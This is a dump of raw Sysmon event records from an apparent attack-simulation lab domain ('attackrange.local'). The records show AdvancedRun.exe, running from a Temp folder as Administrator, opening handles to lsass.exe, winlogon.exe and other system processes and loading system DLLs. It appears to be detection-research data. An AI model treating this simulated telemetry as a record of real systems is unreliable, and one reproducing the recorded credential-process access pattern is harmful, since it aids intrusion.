18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004015389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004015388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.349{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004015386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.349{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 